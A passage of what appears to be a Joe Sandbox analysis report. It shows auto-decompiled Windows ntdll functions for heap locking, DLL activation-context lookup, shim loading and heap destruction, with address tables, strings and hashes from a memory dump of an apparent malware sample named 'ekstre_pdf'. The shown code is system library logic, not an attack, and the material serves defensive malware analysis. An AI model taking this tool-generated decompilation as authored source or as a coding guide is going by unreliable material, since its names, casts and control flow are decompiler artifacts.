				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E340FAA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E3408FEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E3408BAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E3408F300(_t92, _t74);
					}
				}
				goto L6;
			}

0x3408da2a
0x3408da35
0x340cf408
0x3408da90
0x3408da96
0x3408da9b
0x340cf510
0x00000000
0x00000000
0x340cf51f
0x3408daa6
0x3408daa9
0x340cf537
0x340cf53f
0x340cf53f
0x340cf537
0x00000000
0x3408daaf
0x3408daa1
0x3408daa1
0x00000000
0x3408daa1
0x3408da42
0x340cf413
0x340cf41b
0x00000000
0x340cf421
0x3408da4f
0x340cf432
0x340cf451
0x340cf456
0x340cf434
0x340cf449
0x340cf44e
0x340cf462
0x340cf471
0x340cf476
0x340cf47b
0x340cf48d
0x340cf48f
0x340cf496
0x340cf497
0x340cf497
0x00000000
0x340cf49e
0x3408da59
0x00000000
0x00000000
0x3408da5b
0x3408da66
0x3408da6d
0x3408da6d
0x3408da71
0x00000000
0x00000000
0x3408da73
0x3408da77
0x3408da7f
0x3408da80
0x3408da84
0x3408da8a
0x340cf4a8
0x340cf4ab
0x340cf4ab
0x340cf4b0
0x340cf4b3
0x340cf4b8
0x340cf4c1
0x340cf4c1
0x340cf4c4
0x340cf4c8
0x340cf4cb
0x340cf4ce
0x340cf4d5
0x340cf4d8
0x340cf4db
0x340cf4e1
0x00000000
0x00000000
0x340cf4e7
0x340cf4ec
0x340cf4ec
0x340cf4f0
0x340cf4f3
0x340cf4f9
0x340cf503
0x340cf503
0x340cf4f9
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 340CF41B

Strings

, passed to %s, xrefs: 340CF46C
HEAP[%wZ]: , xrefs: 340CF444
RtlUnlockHeap, xrefs: 340CF467
HEAP: , xrefs: 340CF451
Invalid heap signature for heap at %p, xrefs: 340CF45D

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: c1d315bd669f796941cb3decdde29c109acbe2fb5ca557e314903e2972ee432d
Instruction ID: 879b969de5ef4ea9cbaf997de7a822147d5b25adbd0923647665888afba31e07
Opcode Fuzzy Hash: c1d315bd669f796941cb3decdde29c109acbe2fb5ca557e314903e2972ee432d
Instruction Fuzzy Hash: C8410535704745DFE701CB68C684B9EB7E8EF41324F1085E9E4259B291CB78A980CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3410ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3410EDD0
RtlDebugPrintTimes.NTDLL ref: 3410EE45

Strings

Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3410EDE3
---------------------------------------, xrefs: 3410EDF9
Entry Heap Size , xrefs: 3410EDED
HEAP: , xrefs: 3410ECDD

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 75fc0ae6d94c2b7ff25383002e8955cd735f1d720f04b8166057801f5f8c40df
Instruction ID: d9001e466fef3f9b31cc74378fe3e4b41eded9e6f3bf49710e0a1c60b3827c8c
Opcode Fuzzy Hash: 75fc0ae6d94c2b7ff25383002e8955cd735f1d720f04b8166057801f5f8c40df
Instruction Fuzzy Hash: 58416D79A00B15DFD724DF2AC4C4A9ABBB9EF49354725C4E9D408AB221D731EC52DF80

Uniqueness

Uniqueness Score: -1.00%

Function 3408DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84
timeCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E3408DAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E34129109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E3411F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x34153768; // 0x0
					 *0x341591e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3405B910();
					} else {
						E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3405B910("Invalid heap signature for heap at %p", _t53);
					E3405B910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E3405B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x341547a1 = 1;
						asm("int3");
						 *0x341547a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E3406FED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}

0x3408dac8
0x3408dacb
0x3408dad6
0x340cf54e
0x3408db0e
0x3408db14
0x3408db19
0x340cf5ee
0x00000000
0x00000000
0x340cf5fd
0x3408db24
0x3408db27
0x340cf614
0x340cf61c
0x340cf61c
0x340cf614
0x3408db2d
0x3408db2f
0x3408db31
0x3408db31
0x3408db1f
0x3408db1f
0x00000000
0x3408db1f
0x3408dae3
0x340cf559
0x340cf561
0x340cf567
0x00000000
0x340cf567
0x3408daf0
0x340cf578
0x340cf597
0x340cf59c
0x340cf57a
0x340cf58f
0x340cf594
0x340cf5a8
0x340cf5b7
0x340cf5bc
0x340cf5c1
0x340cf5d3
0x340cf5d5
0x340cf5dc
0x340cf5dd
0x340cf5dd
0x340cf5e4
0x00000000
0x3408daf6
0x3408dafa
0x3408db02
0x3408db07
0x3408db07
0x00000000
0x3408dafa

APIs

RtlDebugPrintTimes.NTDLL ref: 340CF561

Strings

RtlLockHeap, xrefs: 340CF5AD
, passed to %s, xrefs: 340CF5B2
HEAP[%wZ]: , xrefs: 340CF58A
HEAP: , xrefs: 340CF597
Invalid heap signature for heap at %p, xrefs: 340CF5A3

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 837890f0072134f1610a0fd965ba86ae6eda493454f968f5c4af950b952c4534
Instruction ID: 4ce67d29b7e645bddf47777f21f30773472905c5e236df136a2ba8d006599c08
Opcode Fuzzy Hash: 837890f0072134f1610a0fd965ba86ae6eda493454f968f5c4af950b952c4534
Instruction Fuzzy Hash: 1E313336305B84DFE712DB68C648B8E7BE8EF01724F0045C8E5114B6A2CB79A940CF16

Uniqueness

Uniqueness Score: -1.00%

Function 34094C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E34094C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x341565e4; // 0x759cf0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x34155b24; // 0x3c52ce0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x341565e4; // 0x759cf0e0
					 *0x341591e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E340626A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x341537c0 & 0x00000003) != 0) {
								E340DE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x341537c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x341537c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E340DE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}

0x34094c42
0x34094c47
0x34094c4a
0x34094c4c
0x34094c52
0x34094cb8
0x34094cbe
0x34094cbe
0x34094c5a
0x34094c5d
0x34094c69
0x34094c6f
0x34094c74
0x34094cd6
0x34094cda
0x340d33b9
0x340d33be
0x340d33f7
0x340d33f7
0x340d33be
0x34094cda
0x34094c76
0x34094c84
0x34094c8c
0x34094c90
0x34094ca9
0x34094ca9
0x34094cae
0x34094ce4
0x34094cee
0x34094cf3
0x34094cf3
0x34094ce6
0x34094ce6
0x34094cb2
0x340d3463
0x340d347b
0x340d3480
0x340d348a
0x340d3490
0x340d3490
0x340d348a
0x00000000
0x34094cb2
0x34094c98
0x34094cc5
0x340d3429
0x00000000
0x00000000
0x340d342f
0x34094cc5
0x34094ca1
0x340d3434
0x340d3435
0x340d344f
0x340d3454
0x340d3454
0x34094ca7
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34094C84

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 340D3439
LdrpFindDllActivationContext, xrefs: 340D3440, 340D346C
minkernel\ntdll\ldrsnap.c, xrefs: 340D344A, 340D3476
Querying the active activation context failed with status 0x%08lx, xrefs: 340D3466

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 7866526f4564327483b956b1fe140606c6e67296261344dd0d212a7ff5e0788f
Instruction ID: ff8f89ddb5965f324da8eed55c6b1f9c0cfd22babc5fee617add03b02073b699
Opcode Fuzzy Hash: 7866526f4564327483b956b1fe140606c6e67296261344dd0d212a7ff5e0788f
Instruction Fuzzy Hash: A631F9FAB28755AFFB519B15C845BD9B2E8FB01394F4283EAE80467170D7709C80DB92

Uniqueness

Uniqueness Score: -1.00%

Function 3408237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E3408237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x341538b8;
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x341568d8; // 0x0
						if(_t22 != 0) {
							E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x341568d8 = _t50;
							 *0x34155d4c = _t50;
						}
					}
					 *0x341538b8 = _t38;
					return _t55;
				}
				_t59 =  *0x341568d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x341538b8 = 0;
					_t55 = E340E1BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x341568d8; // 0x0
						while( *_t51 != 0) {
							 *0x341591e0(_t51, 0, "true", "true", 0, "true", 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x34159218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E3406FED0(0x341532d8);
						if( *0x341565f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E34056704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x341532d8);
						E3406E740(_t46);
						goto L21;
					}
					_t36 =  *0x341537c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E340DE692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x341537c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}

0x34082383
0x3408238b
0x3408238d
0x34082390
0x34082393
0x34082397
0x340823a5
0x340823a8
0x340823aa
0x340823b1
0x340ca878
0x340ca87d
0x340ca883
0x340ca883
0x340823b1
0x340823ba
0x340823c3
0x340823c3
0x34082399
0x3408239f
0x340ca784
0x340ca78f
0x340ca793
0x340ca7cd
0x340ca80b
0x340ca7e3
0x340ca7e9
0x340ca7ee
0x340ca866
0x340ca85f
0x340ca85f
0x00000000
0x340ca85f
0x340ca7f0
0x340ca7f2
0x340ca7f2
0x340ca7f5
0x340ca7f5
0x340ca7f8
0x340ca7fb
0x340ca808
0x340ca808
0x340ca812
0x340ca817
0x340ca81f
0x340ca825
0x340ca826
0x340ca82d
0x340ca82f
0x340ca83b
0x340ca83d
0x340ca849
0x340ca850
0x340ca850
0x340ca849
0x340ca855
0x340ca85a
0x00000000
0x340ca85a
0x340ca795
0x340ca79c
0x340ca7b4
0x340ca7b9
0x340ca7be
0x340ca7c3
0x340ca7c5
0x340ca7c5
0x340ca7c6
0x340ca7c6
0x00000000

Strings

LdrpDynamicShimModule, xrefs: 340CA7A5
apphelp.dll, xrefs: 34082382
minkernel\ntdll\ldrinit.c, xrefs: 340CA7AF
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 340CA79F

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 5ce2577381d3d0967347c6fd21f0cb511fe3be9885bd5bc708900145e5102b48
Instruction ID: 69fc1bcc4b9302ae0a52e71a749ed43d79bb7b78c088ad6514d3359a887955ce
Opcode Fuzzy Hash: 5ce2577381d3d0967347c6fd21f0cb511fe3be9885bd5bc708900145e5102b48
Instruction Fuzzy Hash: D131DD76B40A04EFF7149F5AC984F9E7BB9FB80754F1401EDE801BB250DA7098528F91

Uniqueness

Uniqueness Score: -1.00%

Function 3405F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E3405F8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x3415b370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x34156960 - 2;
					if( *0x34156960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E3405B910();
						} else {
							E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E3405B910();
						__eflags =  *0x34155da8;
						if(__eflags == 0) {
							_t139 = 2;
							E3411FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E340A4B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E341078DE(_t141, _t161, 0, 8, 0);
					}
					E3405FD8E(_t161, _t158);
					E341202EC(_t161);
					_t158 = 1;
					E3405918A(_t161, 1, 0, 0);
					E34128E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x34153758; // 0x0
					 *0x341591e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E341078DE(_t147, _t161, 0, 8, 0);
				}
				E3405FD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E3410F85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E3406FED0(0x34154800);
						E3405FAEC(_t161);
						_push(0x34154800);
						E3406E740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E3405FABA( &_v92,  &_v96, 0x8000);
							_t91 = E34073C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E3411DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E3405FABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E3405FABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E3405FA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E34073C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E34073C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E340A2F90();
								}
							}
							_t107 = E34073C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E34073C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E340A2F90();
							}
							if(E34073C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E3411D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}

0x3405f8b0
0x3405f8b8
0x3405f8c2
0x3405f8c6
0x3405f8c9
0x3405f8ce
0x340be467
0x340be46e
0x340be474
0x340be47a
0x340be47e
0x340be49d
0x340be4a2
0x340be480
0x340be495
0x340be49a
0x340be4a8
0x340be4ad
0x340be4b2
0x340be4ba
0x340be4c2
0x340be4c3
0x340be4c3
0x340be4ba
0x3405f9f6
0x3405f9f6
0x3405f9f8
0x3405f9fc
0x3405f9fd
0x3405f9fe
0x3405fa09
0x3405fa09
0x3405f8db
0x340be4cd
0x340be4d3
0x340be4d6
0x3405fa37
0x3405fa37
0x00000000
0x3405fa37
0x340be4dc
0x340be4e1
0x340be4e3
0x340be4e9
0x340be4eb
0x340be4eb
0x340be4f2
0x340be4f9
0x340be504
0x340be505
0x340be50c
0x00000000
0x340be50c
0x3405f8e8
0x340be516
0x340be51f
0x340be525
0x00000000
0x340be525
0x3405f8ee
0x3405f8ee
0x3405f8f5
0x340be530
0x340be532
0x340be532
0x3405f8fd
0x3405f909
0x340be53c
0x340be543
0x00000000
0x00000000
0x340be54b
0x340be550
0x340be552
0x00000000
0x00000000
0x00000000
0x3405f90f
0x3405f90f
0x3405f918
0x00000000
0x3405f91e
0x3405f924
0x3405f92b
0x3405f930
0x3405f931
0x3405f936
0x3405f93c
0x3405f93e
0x340be55d
0x340be55f
0x340be563
0x340be56a
0x340be578
0x340be57c
0x340be581
0x340be586
0x340be588
0x340be59a
0x340be58a
0x340be593
0x340be593
0x340be59f
0x340be5a2
0x340be5a8
0x340be5ae
0x340be5ae
0x340be5b3
0x340be5b3
0x3405f94d
0x3405fa0c
0x3405f953
0x3405f953
0x3405f953
0x3405f957
0x3405fa17
0x3405fa1b
0x3405fa28
0x3405fa2d
0x3405fa2d
0x3405f95d
0x3405f965
0x340be5c7
0x340be5cc
0x340be5ce
0x340be5d3
0x340be5d3
0x3405f96f
0x3405f981
0x3405f981
0x00000000
0x3405f987
0x3405f98d
0x3405f992
0x3405f999
0x00000000
0x3405f99b
0x3405f99b
0x3405f9a0
0x3405f9ac
0x340be5e3
0x3405f9b2
0x3405f9b2
0x3405f9b2
0x3405f9b7
0x340be5ea
0x340be5f0
0x340be5f7
0x340be5fd
0x340be602
0x340be604
0x340be60f
0x340be60f
0x340be60f
0x340be618
0x340be621
0x340be622
0x340be624
0x340be62c
0x340be62d
0x340be631
0x340be631
0x340be5f7
0x3405f9bd
0x3405f9c2
0x3405f9ce
0x340be644
0x3405f9d4
0x3405f9d4
0x3405f9d4
0x3405f9d9
0x340be64b
0x340be650
0x340be652
0x340be65d
0x340be65d
0x340be65d
0x340be666
0x340be66f
0x340be670
0x340be672
0x340be67a
0x340be67b
0x340be67f
0x340be67f
0x3405f9e6
0x340be692
0x3405f9ec
0x3405f9ec
0x3405f9ec
0x3405f9f4
0x3405fa3d
0x3405fa3d
0x00000000
0x3405f9f4
0x3405f999
0x3405f918

APIs

RtlDebugPrintTimes.NTDLL ref: 340BE51F

Strings

(HeapHandle != NULL), xrefs: 340BE4A8
HEAP[%wZ]: , xrefs: 340BE490
HEAP: , xrefs: 340BE49D

